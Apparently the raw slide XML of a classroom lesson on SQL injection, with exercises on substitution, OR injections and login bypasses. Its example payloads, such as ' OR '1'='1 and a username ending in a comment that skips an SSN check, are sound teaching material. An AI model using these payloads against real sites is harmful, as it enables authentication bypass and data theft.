            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFE599"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Note, the final space is important!</a:t>
            </a:r>
            <a:endParaRPr b="1">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b="1">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This retrieves the record for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>jane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, even if she submits the wrong SSN. This is because the comment (--) causes the database to skip the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>AND ssn=$USER_SSN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> statement, so it doesn’t perform the check at all. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">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6" name="Shape 1236"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238" name="Google Shape;1238;p8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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p8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40" name="Google Shape;1240;p80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="1035900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF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00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-- Retrieve account data for `$USERNAME`, as long as they provide the right SSN       </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.accounts WHERE name='jane';  OR `1`=`1``;  -- AND ssn='$USER_SSN';</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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4" name="Shape 1244"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p8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SQL Substitution Review - Simple Substitutions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1246" name="Google Shape;1246;p8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4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What value does </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>$EXPLOIT_NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1247" name="Google Shape;1247;p8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48" name="Google Shape;1248;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429750" y="1546700"/>
            <a:ext cx="8284500" cy="1035900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>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t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>-- Retrieve account data for `$USERNAME`, as long as they provide the right SSN       </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM warehouse.accounts WHERE name='jane';  OR `1`=`1``;  -- AND ssn='$USER_SSN';</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1249" name="Google Shape;1249;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490650" y="2836050"/>
            <a:ext cx="8223600" cy="197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highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>$USERNAME = jane` OR `1`=`1`; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFD966"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1">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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Note, the final space is important!</a:t>
            </a:r>
            <a:endParaRPr b="1">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b="1">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This retrieves all rows from the accounts table.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFE599"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="160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0" name="Shape 1040"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p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Overview</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p5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Today in class, we’ll cover the following</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043" name="Google Shape;1043;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="491670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44" name="Google Shape;1044;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="13980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SQL Warm-UP</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="2233538"/>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Introduction to SQL Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1046" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="30762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Login Bypasses</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047" name="Google Shape;1047;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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In-Band Injections with sqlmap. </a:t>
            </a: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3" name="Shape 1253"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1254" name="Google Shape;1254;p82"/>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1255" name="Google Shape;1255;p8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56" name="Google Shape;1256;p82"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: OR Injections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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will practice crafting and delivering SQL injections payloads through a vulnerable web form, the query string in the URL bar, and Burp Repeater.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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions sent via Slack.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0" name="Shape 1260"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p8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62" name="Google Shape;1262;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="3446775"/>
            <a:ext cx="3980400" cy="85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90000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>OR Injections</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mon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6" name="Shape 1266"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p8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OR Injection </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p8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69" name="Google Shape;1269;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348300" y="803825"/>
            <a:ext cx="8447400" cy="21936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D966"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>#Modify this payload:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFD966"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = ‘1’;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFD966"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>#So that it results with this query:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFD966"/>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800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT first_name, last_name FROM users WHERE user_id = ` ` OR `1`=`1`;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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3" name="Shape 1273"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p8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OR Injection </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1275" name="Google Shape;1275;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3267550"/>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24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>' OR '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
